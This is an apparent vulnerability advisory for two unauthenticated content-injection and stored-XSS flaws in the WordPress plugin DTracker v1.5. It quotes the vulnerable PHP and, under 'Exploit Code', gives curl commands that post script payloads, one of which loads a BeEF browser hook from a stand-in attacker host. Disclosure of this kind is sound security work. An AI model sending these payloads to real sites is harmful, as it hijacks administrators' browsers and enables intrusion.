Two Content Injection vulnerabilities in Wordpress Plugin DTracker v1.5

["Larry W. Cashdollar" <larry0 () me com>]

Title: Two Content Injection vulnerabilities in Wordpress Plugin DTracker v1.5
Author: Larry W. Cashdollar, @_larry0
Date: 2017-03-08
CVE-ID:[CVE-2017-1002006][CVE-2017-1002007]
Download Site: https://wordpress.org/plugins/dtracker/
Vendor: https://profiles.wordpress.org/dijo/
Vendor Notified: 2017-03-09
Vendor Contact: plugins () wordpress org
Advisory: http://www.vapidlabs.com/advisory.php?v=186
Description: Track the details of the users downloading the pdf files from wordpress site.
Vulnerability:
CVE-2017-1002006:
In file dtracker/save_contact.php

Doesn't check that the user is authorized before injecting new contacts into the wp_contact table.  A simple post 
request will allow any user to add new contacts.  A malicious user could inject javascript into the database to be 
executed in the browser of the admin user.  

$name           = $_POST['name'];
        $company        = $_POST['company'];
        $phone          = $_POST['phone'];
        $country        = $_POST['country'];
        $contact_id = $_POST['contact_id'];
        
        $table  = 'wp_contacts';
        $data   = array(
                                'name'          => $name,
                                'company'       => $company,
                                'phone'         => $phone,
                                'country'       => $country,
                        );
        $where  = array(
                                'id'    => $contact_id
                        );
        
$wpdb->flush();
        
$wpdb->update( $table, $data, $where ); //Update the Contact

CVE-2017-1002007:
In file dtracker/save_mail.php

Doesn't check that the user is authorized before injecting new emails into the wp_contact table.  A simple post request 
will allow any user to add new contacts.  A malicious user could inject javascript into the database to be executed in 
the browser of the admin user.  


$email  = $_POST['email'];
        $time   = date('Y-m-d H:i:s');
        $ip             = $_SERVER [ 'REMOTE_ADDR' ] ; //get IP address of the visitor
        
        $table  = "wp_contacts";
        $data   = array (
                                'email'         => $email,
                                'time'          => $time,
                                'ip'            => $ip  
                        );
        
        $wpdb->insert( $table, $data); //Insert Values
        $contact_id = $wpdb->insert_id; //Get ID of the last inserted row
        $data['contactId'] = $contact_id;
        echo json_encode($data); //Pass the id to the JS

Export: JSON TEXT XML
Exploit Code:
        • $ curl --data "email=\"><script>alert(1);</script>" 
http://example.com/wordpress/wp-content/plugins/dtracker/save_mail.php
        • {"email":"\\\"><script>alert(1);<\/script>","time":"2017-03-09 00:54:06","ip":"example.com","contactId":10577}
        •  
        • Or better yet, inject a BeEF hook:
        •  
        • $ curl --data 'email="><script src=http://BeEF_Host:3000/hook.js></script>' 
http://example.com/wordpress/wp-content/plugins/dtracker/save_mail.php